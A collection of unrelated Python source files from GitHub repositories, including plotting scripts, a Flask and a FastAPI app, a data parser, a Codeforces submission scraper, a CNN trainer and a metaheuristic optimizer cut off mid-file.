points_inside.append((0,0))\n\n points_outside.append((instance.n_positives(), instance.n_negatives()))\n points_outside.append((0, instance.n_negatives()))\n\n return points_inside, points_outside\n\n\n\n#-------------------------------------------------------------------------------\ndef plot_nondominated_atoms(ax, instance):\n\n # compute the non dominated atoms\n solver = Solver(instance)\n nondominated_atoms = solver.compute_nondominated_atoms(list(range(instance.n_atoms())))\n print('non dominated atoms: ', nondominated_atoms)\n\n other_atoms_indexes = [atom_index for atom_index in range(instance.n_atoms()) if not atom_index in nondominated_atoms]\n\n # ax.scatter([instance.atom_score[atom_index][0] for atom_index in LOLH_rule], [instance.atom_score[atom_index][1] for atom_index in LOLH_rule], marker='o', color='red', s=4, label='atomes sélectionnés', zorder=2)\n\n ax.scatter([instance.atom_score[atom_index][0] for atom_index in nondominated_atoms], [instance.atom_score[atom_index][1] for atom_index in nondominated_atoms], marker='x', color='red', label='atomes non dominés', zorder=2)\n\n ax.scatter([instance.atom_score[atom_index][0] for atom_index in other_atoms_indexes], [instance.atom_score[atom_index][1] for atom_index in other_atoms_indexes], marker='x', zorder=1, label='atomes dominés', alpha=0.7)\n\n points_inside, points_outside = compute_polygons(instance, nondominated_atoms)\n\n # display the dominance cones\n index = 0\n for atom_index in nondominated_atoms:\n score = instance.atom_score[atom_index]\n if index == 0:\n bottom = 0\n else:\n bottom = instance.atom_score[nondominated_atoms[index-1]][1]\n if index == len(nondominated_atoms)-1:\n right = instance.n_positives()\n else:\n right = instance.atom_score[nondominated_atoms[index+1]][0]\n\n # bottom\n ax.plot([score[0], score[0]], [score[1], bottom], '--', zorder=1, color='black')\n\n # right\n ax.plot([score[0], right], [score[1], score[1]], '--', zorder=1, color='black')\n\n # label\n # ax.text(score[0], score[1], str(ind))\n index += 1\n\n # equation score = 0\n # ax.plot([0, instance.n_positives()], [0, instance.n_negatives()], color='black', label='score=0.0', zorder=3)\n\n ax.set_xlim([0, instance.n_positives()])\n ax.set_ylim([0, instance.n_negatives()])\n\n ax.set_xlabel('erreur positive')\n 
ax.set_ylabel('erreur négative')\n # ax.set_title('Atom errors for the classification of ' + str(cell_type))\n\n ax.set_aspect(instance.n_positives()/instance.n_negatives())\n\n ax.fill([point[0] for point in points_outside], [point[1] for point in points_outside], alpha=0.3, zorder=0, color='red')\n ax.fill([point[0] for point in points_inside], [point[1] for point in points_inside], alpha=0.3, zorder=0, color='green')\n\n ax.legend(loc='lower right')\n\n return\n\n# import the cell types\nfile_name = '../../dataset/Imagine/cell_types.csv'\ndf_cell_types = pd.read_csv(file_name, index_col=0)\ndf_cell_types.rename(columns={'cellType_final': 'Label'}, inplace=True)\n\n# import the UMAP 2d representation\nfile_name = '../../dataset/Imagine/umap_coordinates.csv'\numap_coordinates = pd.read_csv(file_name, index_col = 0)\n\n# import the single cell discretized matrix\nfile_name = '../../dataset/Imagine/discrete_matrix.csv'\ndf = pd.read_csv(file_name, index_col=0)\n\n\n# Measure of the quality for the CD8 instance\n\n# creation of the classification instance for CD8\ninstance_CD8 = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'CD8')\nfig, ax = plt.subplots()\nplot_nondominated_atoms(ax, instance_CD8)\nsolver_CD8 = Solver(instance_CD8)\nprint('relative area for CD8: ', solver_CD8.compute_relative_atom_area(solver_CD8.compute_nondominated_atoms(list(range(instance_CD8.n_atoms())))))\n\n# Measure of the quality for the NK and CD4 instance\ninstance_NK = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'NK')\ninstance_CD4 = Instance.create_cluster_instance(df.copy(deep=False), df_cell_types, 'CD4')\n\nsolver_NK = Solver(instance_NK)\nsolver_CD4 = Solver(instance_CD4)\nprint('relative area for NK: ', solver_NK.compute_relative_atom_area(solver_NK.compute_nondominated_atoms(list(range(instance_NK.n_atoms())))))\nprint('relative area for CD4: ', solver_CD4.compute_relative_atom_area(solver_CD4.compute_nondominated_atoms(list(range(instance_CD4.n_atoms())))))\n\nfig, axs = plt.subplots(1, 2)\nplot_nondominated_atoms(axs[0], instance_NK)\nplot_nondominated_atoms(axs[1], instance_CD4)\naxs[0].set_title('Instance NK')\naxs[1].set_title('Instance CD4')\n\nplt.show()\n","repo_name":"smbct/LOLH","sub_path":"examples/Imagine/classification_quality.py","file_name":"classification_quality.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7580953542","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\npath2readme = path.abspath(path.dirname(__file__))\nwith open(path.join(path2readme, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='uplift',\n version='0.3.1',\n description='Code for Uplift Modeling.',\n long_description=long_description,\n url='https://github.com/i-yamane/uplift',\n author='Ikko Yamane',\n author_email='yamane@ms.k.u-tokyo.ac.jp',\n python_requires='>=3',\n packages=find_packages(exclude=[])\n)\n","repo_name":"i-yamane/uplift","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"7570621188","text":"import matplotlib.pyplot as plt\r\n\r\nlabels = ['comp', 'mgt','comm', 'acs', 'vcd']\r\n\r\nmen_means = [20,35,30,35,27]\r\nwomen_means = [25,32,34,20,25]\r\n\r\nmen_std = [2, 3, 4, 1, 2]\r\nwomen_std = 
[3,5,2,3,3]\r\n\r\nwidth = 0.35\r\n\r\nfig, ax = plt.subplots()\r\n\r\nax.bar(labels, men_means, width, yerr=men_std, label='Men')\r\nax.bar(labels, women_means, width, yerr=women_std, bottom=men_means, label='Women')\r\n\r\nax.set_ylabel('scores')\r\n\r\nax.set_title('scores by major and gender')\r\n\r\nax.legend()\r\n\r\nplt.show()","repo_name":"faaq02/portofolio","sub_path":"Python/Sample/Table.py","file_name":"Table.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"71227507322","text":"from tests import *\nfrom tests.helpers import *\nfrom contracts.nft_as_collateral import *\n\n@pytest.fixture(scope=\"function\")\ndef nft_as_collateral_app_id(algod_client: AlgodClient):\n    user = generate_funded_account(algod_client)\n    client = ApplicationClient(algod_client, nft_as_collateral_app, signer=user.signer, sender=user.address)\n    app_id, app_addr, _ = client.create()\n    algo_faucet(algod_client, app_addr)\n    return app_id\n\n","repo_name":"palace22/algorand-school-mega-ace-task","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"23056319098","text":"from app import app\nfrom app import db\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nfrom app.static.models import Author\nfrom app.static.models import Book\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n    if request.method == 'POST':\n        # Gather the new data\n        author = request.form['author']\n        book = request.form['title']\n        # Process the data\n        new_author = Author(name=author)\n        new_book = Book(title=book, author_id=new_author.id)\n        new_author.books.append(new_book)\n        try:\n            db.session.add(new_author)\n            db.session.add(new_book)\n            db.session.commit()\n            return redirect('/')\n        except Exception as e:\n            return e\n    else:\n        authors = Author.query.order_by(Author.id).all()\n        return render_template('index.html', authors=authors)\n\n\n@app.route('/authors')\ndef authors():\n    authors = Author.query.order_by(Author.id).all()\n    return render_template('authors.html', authors=authors)\n\n\n@app.route('/books')\ndef books():\n    books = Book.query.order_by(Book.id).all()\n    return render_template('books.html', books=books)\n","repo_name":"gherud/crud-app","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74785403640","text":"#!/usr/local/bin/python\n\nimport sys\n\nusage = \"\"\" Find the decimal value of a binary number stored in a linked list\n\n    Usage: decimalValFromLinkedList.py\n    Example: [1, 0, 1, 1, 0] -> 22\"\"\"\n\ndef main(argv):\n    \"\"\"\n    Executes the main() flow\n    @param argv: Command-line arguments\n    @type argv: array of strings\n    \"\"\"\n    l = ListNode(1, ListNode(0, ListNode(1, ListNode(1, ListNode(0)))))\n    s = Solution()\n    print('Decimal: ', s.getDecimalValue(l))\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n# Input: Linked list with 1 or 0\n# Output: Decimal representation from binary\n# Example: [1, 0, 0] would be 4\n# Option 1: Go over linked list, create array and add numbers\n# to front of array. Then go over array and multiply with the power\n# of the index.\n# Time: O(N), Space: O(N)\nclass Solution:\n    def getDecimalValue(self, head: ListNode) -> int:\n        # error checking\n        if head is None:\n            return -1\n\n        decimal = 0\n        arr = []\n\n        # go over the linked list and insert to front of array\n        node = head\n        while (node is not None):\n            arr.insert(0, node.val)\n            node = node.next\n\n        # multiply results\n        i = 0\n        n = len(arr)\n        while i < n:\n            if arr[i] == 1:\n                decimal += pow(2, i)\n            i += 1\n\n        return decimal\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])","repo_name":"iizrailevsky/various-problems","sub_path":"modules/main/src/main/python/decimalValFromLinkedList.py","file_name":"decimalValFromLinkedList.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"42515146950","text":"from django.db import models\nfrom apps.users.models import UserProfile\nfrom datetime import datetime\nfrom DjangoUeditor.models import UEditorField\n\n\n# Create your models here.\nclass BlogArt(models.Model):\n    title = models.CharField(max_length=50, null=False, verbose_name=\"文章标题\")\n    author = models.ForeignKey(UserProfile, on_delete=models.CASCADE, verbose_name=\"作者\")\n    label = models.CharField(max_length=50, verbose_name=\"标签\")\n    add_time = models.DateTimeField(default=datetime.now, verbose_name=\"添加时间\")\n    content = UEditorField(width=\"120%\", height=600, toolbars='normal', imagePath=\"blog/images/\", filePath=\"blog/files/\", default=\"\", verbose_name=u\"文章内容\")\n\n    class Meta:\n        verbose_name = \"文章管理\"\n        verbose_name_plural = verbose_name\n\n    def __str__(self):\n        return self.title","repo_name":"souno-git/Django-env-base","sub_path":"BRITmanage/apps/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"14558251264","text":"# Read MB vaccination data\n\nimport numpy as np\nimport datetime\nfrom datetime import timedelta\n\nregional_abbreviations = {\n    'All':'mb',\n    'Interlake-Eastern':'ie',\n    'Northern':'no',\n    'Prairie Mountain Health':'pm',\n    'Southern Health-Santé Sud':'sh',\n    'Winnipeg':'wg'\n    }\n\nfirst_doses = {'header':'Cumulative_First_Doses', 'sym':'xt', 'dict_by_date': {}, 'column':None}\ncsv_data = [first_doses]\n\ndate_data = {'header':'Vaccination_Date', 'sym':'', 'column':None}\ndata = csv_data+[date_data]\n\nfile = 'Manitoba_COVID-19_Vaccinations_-_Daily_Statistics.csv'\n\nend_date = datetime.date(2020, 3, 1)\n\nwith open(file) as f:\n    for i,line in enumerate(f):\n        fields = line.split(',')\n        if i == 0:\n            for i_field,field in enumerate(fields):\n                for datum in data:\n                    if datum['header'] == field:\n                        datum['column'] = i_field\n                        break\n        else:\n            raw_datetime = fields[date_data['column']]\n            raw_date = raw_datetime.split(' ')[0]\n            dd = raw_date.split('/')\n            if len(dd) == 3:\n                date = datetime.date(int(dd[0]), int(dd[1]), int(dd[2]))\n                if (date - datetime.date(2020,2,29)).days > 0:\n                    for datum in csv_data:\n                        dict_by_date = datum['dict_by_date']\n                        value = (fields[datum['column']]).strip()\n                        dict_by_date[date] = value\n\n                    if (date - end_date).days > 0:\n                        end_date = date\n\nstart_date = datetime.date(2020, 3, 1)\nwith open('mb-vacc-pypm.csv', 'w') as the_file:\n\n    hbuff = ['date']\n    for rha_name in regional_abbreviations:\n        rha = regional_abbreviations[rha_name]\n        for datum in csv_data:\n            hbuff.append(rha + '-' + datum['sym'])\n    the_file.write(','.join(hbuff) + 
'\\n')\n\n ndays = (end_date - start_date).days + 1\n for i in range(ndays):\n date = start_date + datetime.timedelta(days=i)\n buff = [str(date)]\n for rha_name in regional_abbreviations:\n rha = regional_abbreviations[rha_name]\n if rha == 'mb':\n for datum in csv_data:\n dict_by_date = datum['dict_by_date']\n if date in dict_by_date:\n buff.append(dict_by_date[date])\n else:\n buff.append('')\n else:\n buff.append('')\n\n the_file.write(','.join(buff) + '\\n')\n","repo_name":"pypm/data","sub_path":"covid19/Manitoba/make_mb_vacc_csv.py","file_name":"make_mb_vacc_csv.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36890886968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 24 02:29:11 2020\n\n@author: pranay\n\"\"\"\n\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip as clipboard\nimport os\nimport time\nimport json\n\nuser_handle = \"pranay_garg\"\nbase_url = \"https://codeforces.com/api/\"\napi_name = \"\"\n \ndef contest_list() : \n\n api_name = \"contest.list\"\n st = time.time()\n et = time.time()\n response = requests.get(base_url+api_name)\n print(\"time to fetch contest list : \",time.time()-st)\n \n valid_contest = [] \n\n api_name = \"contest.status\"\n\n for item in response.json()['result'] : \n print(\"running\")\n\n if item['phase'] != \"FINISHED\" : \n continue\n \n parameters = {\n \"contestId\" : item[\"id\"],\n \"handle\" : user_handle\n }\n \n subs = []\n st = time.time()\n res = requests.get(base_url+api_name,parameters)\n print(\"time to fetch subs list for curr contest :\",time.time()-st)\n\n if(res.json()['status']!='OK') :\n continue\n\n sub_list = res.json()['result']\n \n if len(sub_list) == 0:\n continue\n\n st = time.time()\n for val in sub_list :\n if val['verdict'] == \"OK\" : \n subs.append({\n \"id\" : val['id'],\n \"index\" : val['problem']['index'],\n \"name\" : val['problem']['name']\n })\n print(\"time to iterate over all subs\",time.time()-st)\n\n if len(subs) == 0:\n continue\n \n valid_contest.append({\n \"id\" : item['id'],\n \"name\" : item['name'],\n \"subs\" : subs\n })\n print(\"total time required :\",time.time()-et)\n return valid_contest\n\nval = contest_list()\nwith open(\"valid_contest.txt\",'w') as f : \n json.dump(json.dumps(val), f)\n\n# with open(\"valid_contest.txt\",'r') as f :\n# temp = json.load(f)\n \n# val = json.loads(temp)\n\nsubmission_url = \"https://codeforces.com/contest/\"\n\ndriver = webdriver.Chrome(\"/usr/bin/chromedriver\")\n\nbase_dir = '/media/pranay/PG/PRANAY/Competitive Coding/competitive-submissions/codeforces-submissions'\nos.chdir(base_dir)\n\n\nfor c in val : \n if os.path.exists(os.path.join(os.getcwd(), c['name'])) == True :\n continue\n os.mkdir(c['name'])\n new_dir = os.path.join(os.getcwd(), c['name'])\n os.chdir(new_dir)\n print(c['id'],c['name'])\n \n\n done = {}\n\n for s in c['subs']:\n curr_url = submission_url+str(c['id'])+'/submission/'+str(s['id'])\n driver.get(curr_url)\n driver.find_element(By.CLASS_NAME,\"source-copier\").click()\n data = clipboard.paste()\n # print(data)\n \n file_name = str(s['index'])+\". 
\"+s['name']\n if str(s['index']) not in done.keys():\n done[str(s['index'])] = 1\n else:\n file_name += str(done[str(s['index'])])\n done[str(s['index'])]+=1\n \n file_name += '.cpp'\n file_name = file_name.replace('/','-')\n file_name = file_name.replace('?','')\n file_name = file_name.replace('*','')\n \n with open(file_name,'w') as f : \n print(data,file = f)\n time.sleep(3)\n \n os.chdir(base_dir)","repo_name":"pg30/Competitive-Submissions","sub_path":"codeforces_script.py","file_name":"codeforces_script.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24710827812","text":"import pandas as pd\nimport os, random\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom TrafficDetection.imageOperations import augmentDataInFiles\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom sklearn.model_selection import train_test_split\nfrom kerastuner.tuners import RandomSearch\n\nimg_path = \"data/images/\"\n\n# Import labels.csv\nlabels_dataset = pd.read_csv(\"data/labels.csv\")\ntemp_labels = labels_dataset.iloc[:, 0]\n\n########### Uncomment below code if augmented data is lost ###########################\n# Import images\ni = 0\n# max_count = 2010\n# while i < 43:\n# file_count = 0\n# current_path = img_path + str(i) + \"/\"\n# # print(current_path)\n# for file in os.listdir(current_path):\n# img = cv.imread(os.path.join(current_path, file), 0)\n# # temp_img_list.append(img)\n# # temp_label_list.append(temp_train_labels[i])\n# file_count += 1\n# print(file_count)\n# augment_count = max_count - file_count\n# print(augment_count)\n# save_path = current_path + \"new/\"\n# if not os.path.exists(save_path):\n# os.makedirs(save_path)\n# if(augment_count < file_count):\n# new_files = 2\n# else:\n# new_files = round(augment_count / file_count)\n# print(new_files)\n# augmentDataInFiles(noOfNewFiles=new_files, fromDir=current_path, saveDir=save_path, maxFiles=augment_count)\n# copy_tree(save_path, current_path)\n# remove_tree(save_path)\n# i += 1\n\nprint(\"Image data adjustments done\")\n\n# Initialize the lists\nlabel_count = 0\ntemp_img_list = []\ntemp_label_list = []\n\n# Store the augmented images and labels\nwhile i < 43:\n file_count = 0\n current_path = img_path + str(i) + \"/\"\n print(current_path)\n for file in os.listdir(current_path):\n img = cv.imread(os.path.join(current_path, file), 0)\n temp_img_list.append(img)\n temp_label_list.append(temp_labels[i])\n file_count += 1\n i += 1\n print(file_count)\n\n# Convert the lists to numpy arrays\nall_images = np.array(temp_img_list)\nall_labels = np.array(temp_label_list)\n\n# Create separate training and test data\ntrain_images, test_images, train_labels, test_labels = train_test_split(all_images, all_labels, test_size=0.2,\n shuffle=True)\n\n# Normalize the image data\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\norig_test_images = test_images\n\n# Reshape the arrays according to CNN input\ntrain_images = train_images.reshape(len(train_images), 32, 32, 1)\ntest_images = test_images.reshape(len(test_images), 32, 32, 1)\n\n\n################## Training part #######################\n# For Hyper-parameter optimization\ndef build_model(hp):\n model = keras.Sequential()\n model.add(keras.layers.Conv2D(\n filters=hp.Int('conv_1_filter', min_value=128, max_value=256, step=16),\n kernel_size=hp.Choice('conv_1_kernel', values=[3, 5]),\n activation='relu',\n 
input_shape=(32, 32, 1)\n    ))\n    model.add(keras.layers.Dropout(0.3))\n    model.add(keras.layers.Conv2D(\n        filters=hp.Int('conv_2_filter', min_value=64, max_value=128, step=16),\n        kernel_size=hp.Choice('conv_2_kernel', values=[3, 5]),\n        activation='relu'\n    ))\n    model.add(keras.layers.Dropout(0.3))\n    model.add(keras.layers.MaxPool2D(pool_size=(2, 2)))\n    model.add(keras.layers.Flatten())\n    model.add(keras.layers.Dense(\n        units=hp.Int('dense_1_units', min_value=64, max_value=256, step=32),\n        activation='relu'\n    ))\n    model.add(keras.layers.Dropout(0.5))\n    model.add(keras.layers.Dense(43, activation='softmax'))\n\n    model.compile(\n        optimizer=keras.optimizers.Adam(hp.Choice('learning_rate', values=[1e-2, 1e-3, 1e-4])),\n        loss='sparse_categorical_crossentropy',\n        metrics=['accuracy'])\n    return model\n\n\ntuner = RandomSearch(\n    build_model,\n    objective='val_accuracy',\n    max_trials=5,\n    directory='output',\n    project_name='models'\n)\n\n# Search for the best model\ntuner.search(train_images, train_labels, epochs=3, validation_split=0.1)\n\nmodel = tuner.get_best_models(num_models=1)[0]\n\nmodel.summary()\n\n# Train the data with the best model\nmodel.fit(train_images, train_labels, batch_size=100, epochs=10, validation_split=0.1, initial_epoch=3)\n\n# Check the test data\nm = 0\nimg = test_images[m]\nimg = np.expand_dims(img, axis=0)\nprediction = model.predict_classes(img)\nplt.imshow(orig_test_images[m])\nplt.show()\nprint(prediction)\nprint(\"Original :\")\nprint(test_labels[m])\n\n#################### Just for printing things ##########################\n\n# print(train_images.shape)\n# print(train_labels.shape)\n# print(test_images.shape)\n# print(test_labels.shape)\n# plt.imshow(train_images[10])\n# plt.show()\n# cv.waitKey(0)\n# print(train_labels[10])\n","repo_name":"sanjit1995/Traffic-Sign-Detector","sub_path":"trafficSign.py","file_name":"trafficSign.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74680966519","text":"class Atm:\r\n    def __init__(self,cardno,pin):\r\n        self.cardno=cardno\r\n        self.pin=pin\r\n    def checkBalance(self):\r\n        print(\"Your balance is 200000\")\r\n    def debitAmount(self,amount):\r\n\r\n        leftAmount=200000-amount\r\n        print(\"You have withdrawn: \"+str(amount)+\". Your remaining balance is: \"+str(leftAmount))\r\n\r\ndef main():\r\n    cardNo=input(\"Enter your card no.:\")  \r\n    pinNo=input(\"Enter your pin:\")  \r\n    \r\n    atmCard=Atm(cardNo,pinNo)\r\n\r\n    print(\"Choose your action:\")\r\n    print(\"1.Balance Enquiry 2.Withdrawal\")\r\n    action=int(input(\"enter your choice:\"))\r\n\r\n    if(action==1):\r\n        atmCard.checkBalance()\r\n    elif(action==2):\r\n        amount=int(input(\"enter the amount to be withdrawn:\"))\r\n        atmCard.debitAmount(amount)\r\n    else:\r\n        print(\"enter a valid choice\")\r\n    \r\n    \r\nif __name__==\"__main__\":\r\n    main()\r\n    \r\n\r\n    ","repo_name":"Prajit-Shandilya/Bank-Atm","sub_path":"Home Assignment C-100/Atm.py","file_name":"Atm.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"5581984957","text":"from fastapi import FastAPI, Body\nfrom database import *\nfrom datetime import datetime\nfrom fastapi.middleware.cors import CORSMiddleware\nimport os\n\napp = FastAPI()\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef root():\n    return 
{\"status\": \"ready\"}\n\n\n@app.get(\"/get_subjects\")\ndef get_subjects():\n subjects = select_all_subjects()\n subjects_list = [f\"{i[0]}\" for i in subjects]\n return subjects_list\n\n\n@app.get(\"/get_classes\")\ndef get_teachers():\n classes = select_all_classes()\n classes_list = [f\"{i[0]}\" for i in classes]\n return classes_list\n\n\n@app.get(\"/get_lessons_plan\")\ndef get_lessons_plan(date, class_name):\n datetime_date = datetime.strptime(date, f\"%d-%m-%Y\")\n data = select_lessons_data(date=datetime_date, class_name=class_name)\n return str (data)\n\n\n# @app.post(\"/input_lessons_plan\")\n# def input_lessons_plan(class_name, subject_name, teacher_name, teacher_lastname, start_lesson, end_lesson, lesson_date):\n@app.get(\"/get_teachers\")\ndef get_teachers():\n teachers = select_all_teachers()\n teachers_list = [f\"{i[0]} {i[1]}\" for i in teachers]\n return teachers_list\n\n\n@app.get(\"/add_teacher\")\ndef add_teacher(teacher_name, teacher_lastname):\n input_teacher_data(teacher_name=teacher_name, teacher_lastname=teacher_lastname)\n return {\"status\": \"ok\"}\n\n\n@app.get(\"/add_class\")\ndef add_class(class_name):\n input_class_data(class_name=class_name.lower())\n return {\"status\": \"ok\"}\n\n\n# [1b, Matematyka, Mateusz, Kozłowski, 06-06-2023, 8.30, 9,30]\n\n@app.post(\"/add_lessons\")\ndef add_lessons(data: dict = Body(...)):\n # print(data[\"class_name\"], data[\"subject_name\"], data[\"teacher_name\"].split()[0],\n # data[\"teacher_name\"].split()[1],\n # data[\"lesson_ date\"], data[\"start_lesson\"], data[\"end_lesson\"])\n input_lesson_data(class_name=data[\"class_name\"], subject_name=data[\"subject_name\"], teacher_name=data[\"teacher_name\"].split()[0],\n teacher_lastname=data[\"teacher_name\"].split()[1],\n lesson_date=data[\"lesson_date\"], start_lesson=data[\"start_lesson\"], end_lesson=data[\"end_lesson\"])\n return {\"status\": \"ok\"}\n\n\nif __name__ == \"__main__\":\n os.system(\"python -m uvicorn main:app --reload\") # --host 0.0.0.0\n","repo_name":"VodkaAzFYR/DataBasesProject2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9888978860","text":"#The program prints out an isoceles triangle with height given\r\n#Student no.:TMXTHA006\r\n#Name: TEMA, Thabo Hebert\r\n#Date: 20 March 2014\r\n\r\nh = eval(input(\"Enter the height of the triangle:\\n\"))\r\np = 1\r\nq = h-1\r\nfor i in range(h):\r\n print(\" \"*q, \"*\"*p, sep=\"\")\r\n q-=1\r\n p+=2","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/tmxtha006/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2111231281","text":"#!/usr/bin/env python\n# Created by \"Thieu\" at 07:03, 18/03/2020 ----------%\n# Email: nguyenthieu2102@gmail.com %\n# Github: https://github.com/thieu1995 %\n# --------------------------------------------------%\n\nimport numpy as np\nfrom mealpy.optimizer import Optimizer\n\n\nclass OriginalHGSO(Optimizer):\n \"\"\"\n The original version of: Henry Gas Solubility Optimization (HGSO)\n\n Links:\n 1. 
https://www.sciencedirect.com/science/article/abs/pii/S0167739X19306557\n\n Hyper-parameters should fine-tune in approximate range to get faster convergence toward the global optimum:\n + n_clusters (int): [2, 10], number of clusters, default = 2\n\n Examples\n ~~~~~~~~\n >>> import numpy as np\n >>> from mealpy.physics_based.HGSO import OriginalHGSO\n >>>\n >>> def fitness_function(solution):\n >>> return np.sum(solution**2)\n >>>\n >>> problem_dict1 = {\n >>> \"fit_func\": fitness_function,\n >>> \"lb\": [-10, -15, -4, -2, -8],\n >>> \"ub\": [10, 15, 12, 8, 20],\n >>> \"minmax\": \"min\",\n >>> }\n >>>\n >>> epoch = 1000\n >>> pop_size = 50\n >>> n_clusters = 3\n >>> model = OriginalHGSO(epoch, pop_size, n_clusters)\n >>> best_position, best_fitness = model.solve(problem_dict1)\n >>> print(f\"Solution: {best_position}, Fitness: {best_fitness}\")\n\n References\n ~~~~~~~~~~\n [1] Hashim, F.A., Houssein, E.H., Mabrouk, M.S., Al-Atabany, W. and Mirjalili, S., 2019. Henry gas solubility\n optimization: A novel physics-based algorithm. Future Generation Computer Systems, 101, pp.646-667.\n \"\"\"\n\n def __init__(self, epoch=10000, pop_size=100, n_clusters=2, **kwargs):\n \"\"\"\n Args:\n epoch (int): maximum number of iterations, default = 10000\n pop_size (int): number of population size, default = 100\n n_clusters (int): number of clusters, default = 2\n \"\"\"\n super().__init__(**kwargs)\n self.epoch = self.validator.check_int(\"epoch\", epoch, [1, 100000])\n self.pop_size = self.validator.check_int(\"pop_size\", pop_size, [10, 10000])\n self.n_clusters = self.validator.check_int(\"n_clusters\", n_clusters, [2, int(self.pop_size/5)])\n self.set_parameters([\"epoch\", \"pop_size\", \"n_clusters\"])\n self.n_elements = int(self.pop_size / self.n_clusters)\n self.sort_flag = False\n self.T0 = 298.15\n self.K = 1.0\n self.beta = 1.0\n self.alpha = 1\n self.epsilon = 0.05\n self.l1 = 5E-2\n self.l2 = 100.0\n self.l3 = 1E-2\n\n def initialize_variables(self):\n self.H_j = self.l1 * np.random.uniform()\n self.P_ij = self.l2 * np.random.uniform()\n self.C_j = self.l3 * np.random.uniform()\n self.pop_group, self.p_best = None, None\n\n def initialization(self):\n if self.pop is None:\n self.pop = self.create_population(self.pop_size)\n self.pop_group = self.create_pop_group(self.pop, self.n_clusters, self.n_elements)\n self.p_best = self.get_best_solution_in_team__(self.pop_group) # multiple element\n\n def flatten_group__(self, group):\n pop = []\n for idx in range(0, self.n_clusters):\n pop += group[idx]\n return pop\n\n def get_best_solution_in_team__(self, group=None):\n list_best = []\n for i in range(len(group)):\n _, best_agent = self.get_global_best_solution(group[i])\n list_best.append(best_agent)\n return list_best\n\n def evolve(self, epoch):\n \"\"\"\n The main operations (equations) of algorithm. Inherit from Optimizer class\n\n Args:\n epoch (int): The current iteration\n \"\"\"\n ## Loop based on the number of cluster in swarm (number of gases type)\n for i in range(self.n_clusters):\n ### Loop based on the number of individual in each gases type\n pop_new = []\n for j in range(self.n_elements):\n F = -1.0 if np.random.uniform() < 0.5 else 1.0\n\n ##### Based on Eq. 
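Equations 8-10 referenced in `evolve` below compress into a short numeric recurrence. This stand-alone sketch replays just the Henry's-coefficient and solubility updates with the constants from `__init__` above, so the decay behavior can be inspected outside the optimizer; the epoch count is an arbitrary choice, and `np.exp(-epoch / epochs)` plays the role of the iteration-dependent temperature:

```python
import numpy as np

T0, K = 298.15, 1.0
H_j = 5e-2 * np.random.uniform()    # Henry's coefficient (l1 scale)
P_ij = 100.0 * np.random.uniform()  # partial pressure (l2 scale)
C_j = 1e-2 * np.random.uniform()    # gas constant (l3 scale)

epochs = 5
for epoch in range(epochs):
    # Eq. (8): temperature-driven exponential decay of Henry's coefficient
    H_j = H_j * np.exp(-C_j * (1.0 / np.exp(-epoch / epochs) - 1.0 / T0))
    # Eq. (9): solubility of the gas under partial pressure P_ij
    S_ij = K * H_j * P_ij
    print(f"epoch {epoch}: H_j={H_j:.6f}  S_ij={S_ij:.4f}")
```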
